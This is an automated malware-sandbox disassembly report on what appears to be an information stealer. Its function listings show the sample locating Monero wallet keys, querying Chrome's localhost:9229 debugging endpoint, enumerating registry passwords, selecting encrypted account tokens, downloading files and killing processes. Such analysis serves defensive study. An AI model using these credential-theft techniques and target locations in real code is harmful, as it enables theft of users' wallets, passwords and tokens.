\Monero\wallet.keys, xrefs: 00E1138D

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 3478931302-218353709
Opcode ID: 934caeb47e5bd928ce536056724d121ccf05232cb9cfe0a9c7ca39ac7483e0d4
Instruction ID: 9db7e353854ada43e59cdb6f5525e1a957cd54a29512059f214bdd82c1512c63
Opcode Fuzzy Hash: 934caeb47e5bd928ce536056724d121ccf05232cb9cfe0a9c7ca39ac7483e0d4
Instruction Fuzzy Hash: B65144B1D5012857CB15FB60EDA2FED73BDAF54700F4455E8B60A72092EE305B88CBA6

Function 00E19A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(00E30AF6,00000001,00000000,00000000,00000000), ref: 00E19A6A
InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00E19AAB
InternetCloseHandle.WININET(00000000), ref: 00E19AC7

Strings

"webSocketDebuggerUrl":, xrefs: 00E19B4B
http://localhost:9229/json, xrefs: 00E19A9F
"ws://, xrefs: 00E19B84

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Internet$Open$CloseHandle
String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
API String ID: 3289985339-2144369209
Opcode ID: 8c9fa9fdb8f558d0c21b4a1afded9f1f7a97d1e48679c3c69059c8a4c81d9021
Instruction ID: a477282fc353eca7e22bb35d689fe7ed9730d6157b915f072513ce8068ea8b6d
Opcode Fuzzy Hash: 8c9fa9fdb8f558d0c21b4a1afded9f1f7a97d1e48679c3c69059c8a4c81d9021
Instruction Fuzzy Hash: 67415C35A50218ABCB24EFA4DC95FDDB7B4BB48740F105098F149BB191CBB4AEC0CB60

Function 00E17630 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00E17330: memset.MSVCRT ref: 00E17374
Part of subcall function 00E17330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00E1739A
Part of subcall function 00E17330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00E17411
Part of subcall function 00E17330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00E1746D
Part of subcall function 00E17330: GetProcessHeap.KERNEL32(00000000,?), ref: 00E174B2
Part of subcall function 00E17330: HeapFree.KERNEL32(00000000), ref: 00E174B9

lstrcat.KERNEL32(00000000,00E3192C), ref: 00E17666
lstrcat.KERNEL32(00000000,00000000), ref: 00E176A8
lstrcat.KERNEL32(00000000, : ), ref: 00E176BA
lstrcat.KERNEL32(00000000,00000000), ref: 00E176EF
lstrcat.KERNEL32(00000000,00E31934), ref: 00E17700
lstrcat.KERNEL32(00000000,00000000), ref: 00E17733
lstrcat.KERNEL32(00000000,00E31938), ref: 00E1774D
task.LIBCPMTD ref: 00E1775B

Strings

: , xrefs: 00E176AE

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
String ID: :
API String ID: 3191641157-3653984579
Opcode ID: 704c7104541f049207de8216530d4e0e7a9f4c865c886968a9f90e3e8dff6425
Instruction ID: dfe981441b356d6da3b06a4281742f04fb5a64d5d966e851faa1d6dd490e17e5
Opcode Fuzzy Hash: 704c7104541f049207de8216530d4e0e7a9f4c865c886968a9f90e3e8dff6425
Instruction Fuzzy Hash: 5531A176E00108EBDB18EBE0DD95DFF77F8AB44701F105119F142BB294CA39A985CB90

Function 00E17330 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00E17374
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00E1739A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00E17411
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00E1746D
GetProcessHeap.KERNEL32(00000000,?), ref: 00E174B2
HeapFree.KERNEL32(00000000), ref: 00E174B9
task.LIBCPMTD ref: 00E175B5

Strings

Password, xrefs: 00E17461

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuememsettask
String ID: Password
API String ID: 2808661185-3434357891
Opcode ID: b22a6df25508b2fe2bf7cc03cc119f724e33ed27571d7634a8b6fe2014dffd92
Instruction ID: e65ab1f40a6b5b7880eb05dbe06f176563e77016eb37e5c464310052ce823e80
Opcode Fuzzy Hash: b22a6df25508b2fe2bf7cc03cc119f724e33ed27571d7634a8b6fe2014dffd92
Instruction Fuzzy Hash: DF614BB190426C9BDB24DB50CC55BDAB7B9BF48700F0081E9E689B6141EF706BC9CF90

Function 00E28290 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0099F290,00000000,?,00E30E14,00000000,?,00000000), ref: 00E282C0
RtlAllocateHeap.NTDLL(00000000), ref: 00E282C7
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00E282E8
__aulldiv.LIBCMT ref: 00E28302
__aulldiv.LIBCMT ref: 00E28310
wsprintfA.USER32 ref: 00E2833C

Strings

%d MB, xrefs: 00E28333
@, xrefs: 00E282DD

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2774356765-3474575989
Opcode ID: 1c3e386dca8c1c5b3bbb258853d7959aedfa9b792e99b386f31315299e507f73
Instruction ID: c4e5ffd1749861a38f20aa071c285c9061ed6f7b83913310e80ce3d6036d30d2
Opcode Fuzzy Hash: 1c3e386dca8c1c5b3bbb258853d7959aedfa9b792e99b386f31315299e507f73
Instruction Fuzzy Hash: D8215CB1E44318ABDB10DFD5DD4AFAEBBB8FB44B00F104609F215BB280C77969008BA4

Function 00E19E30 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 163stringsleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00E28CF0: GetSystemTime.KERNEL32(00E30E1B,0099EA10,00E305B6,?,?,00E113F9,?,0000001A,00E30E1B,00000000,?,00998918,?,\Monero\wallet.keys,00E30E1A), ref: 00E28D16

wsprintfA.USER32 ref: 00E19E7F
memset.MSVCRT ref: 00E19EED
lstrcat.KERNEL32(00000000,?), ref: 00E19F03
lstrcat.KERNEL32(00000000,?), ref: 00E19F17
lstrcat.KERNEL32(00000000,00E312D8), ref: 00E19F29
lstrcpy.KERNEL32(?,00000000), ref: 00E19F7C
memset.MSVCRT ref: 00E19F9C
Sleep.KERNEL32(00001388), ref: 00E1A013

Part of subcall function 00E299A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E299C5
Part of subcall function 00E299A0: Process32First.KERNEL32(00E1A056,00000128), ref: 00E299D9
Part of subcall function 00E299A0: Process32Next.KERNEL32(00E1A056,00000128), ref: 00E299F2
Part of subcall function 00E299A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E29A4E
Part of subcall function 00E299A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00E29A6C
Part of subcall function 00E299A0: CloseHandle.KERNEL32(00000000), ref: 00E29A79
Part of subcall function 00E299A0: CloseHandle.KERNEL32(00E1A056), ref: 00E29A88

Strings

D, xrefs: 00E19FA4

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseHandleProcessProcess32memset$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
String ID: D
API String ID: 3242155833-2746444292
Opcode ID: 0a5fe9d677da0cf05ca332e48d8a6a99c9f1299a110a2b4a49618df2d6500879
Instruction ID: 3ca156275bed02e46cd9a49b31b09baf2545a96566f39d510028237b0c252192
Opcode Fuzzy Hash: 0a5fe9d677da0cf05ca332e48d8a6a99c9f1299a110a2b4a49618df2d6500879
Instruction Fuzzy Hash: C051A4B1944318ABEB24DB60DC4AFDA73B8AB44704F044598F60DBB2C1EB759B84CF51

Function 00E160F0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6

Part of subcall function 00E14800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E14889
Part of subcall function 00E14800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E14899

InternetOpenA.WININET(00E30DFB,00000001,00000000,00000000,00000000), ref: 00E1615F
StrCmpCA.SHLWAPI(?,0099FB60), ref: 00E16197
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00E161DF
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00E16203
InternetReadFile.WININET(?,?,00000400,?), ref: 00E1622C
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00E1625A
CloseHandle.KERNEL32(?,?,00000400), ref: 00E16299
InternetCloseHandle.WININET(?), ref: 00E162A3
InternetCloseHandle.WININET(00000000), ref: 00E162B0

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2507841554-0
Opcode ID: 9ab24cac26fc6149b852954bebfa3ecd616372c447b167b0e60acd385e9d5c14
Instruction ID: d0a5086038f402ed960ea9f1516b2d57f66b0fd059a3492d0fa42aa7d0aa5b7c
Opcode Fuzzy Hash: 9ab24cac26fc6149b852954bebfa3ecd616372c447b167b0e60acd385e9d5c14
Instruction Fuzzy Hash: 365171B1A00218ABDF24DF94DC45BEE77B9AB44705F008098F605BB1C0DB75AAC9CF95

Function 00E9012E Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00E9024D
___TypeMatch.LIBVCRUNTIME ref: 00E9035B
CatchIt.LIBVCRUNTIME ref: 00E903AC
CallUnexpected.LIBVCRUNTIME ref: 00E904C8

Strings

csm, xrefs: 00E901D8
csm, xrefs: 00E90284
csm, xrefs: 00E9016B

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 2356445960-393685449
Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
Instruction ID: 502696aaca0e10e22ca525dace578fd5f7b358abcaffa4a03df9ab9af7f2768a
Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
Instruction Fuzzy Hash: 82B19D71800209EFCF25EFA4C8819AEBBB5FF04314F94616AE9297B252D731DA51CF91

Function 00E278B0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E278C4
RtlAllocateHeap.NTDLL(00000000), ref: 00E278CB
RegOpenKeyExA.ADVAPI32(80000002,0098BC68,00000000,00020119,Ix), ref: 00E278EB
RegQueryValueExA.ADVAPI32(Ix,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00E2790A
RegCloseKey.ADVAPI32(Ix), ref: 00E27914

Strings

CurrentBuildNumber, xrefs: 00E27901
Ix, xrefs: 00E278D4, 00E27910, 00E27906, 00E278D7, 00E27909, 00E27913

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: CurrentBuildNumber$Ix
API String ID: 3225020163-4041952297
Opcode ID: 1a4dfbae7247c6f81322a61291635908a09a735aff8d6f9328d845ea5c7f1378
Instruction ID: fcfe41526257e84b7519a6e8e934d3257fbbeea03604742a3fd5689e236c0fee
Opcode Fuzzy Hash: 1a4dfbae7247c6f81322a61291635908a09a735aff8d6f9328d845ea5c7f1378
Instruction Fuzzy Hash: A70167B5E40309BFDB10DBD5EC4AFAEB7B8EB44B00F004598F645AB284D7759A40CB90

Function 00E1BA50 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98

Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,00998918,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22

Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92

Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15

Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6

lstrlen.KERNEL32(00000000), ref: 00E1BC6F

Part of subcall function 00E28FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E28FE2

StrStrA.SHLWAPI(00000000,AccountId), ref: 00E1BC9D
lstrlen.KERNEL32(00000000), ref: 00E1BD75
lstrlen.KERNEL32(00000000), ref: 00E1BD89

Strings

AccountTokens, xrefs: 00E1BA8A
SELECT service, encrypted_token FROM token_service, xrefs: 00E1BBBB
AccountTokens, xrefs: 00E1BB19
AccountId, xrefs: 00E1BC94

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
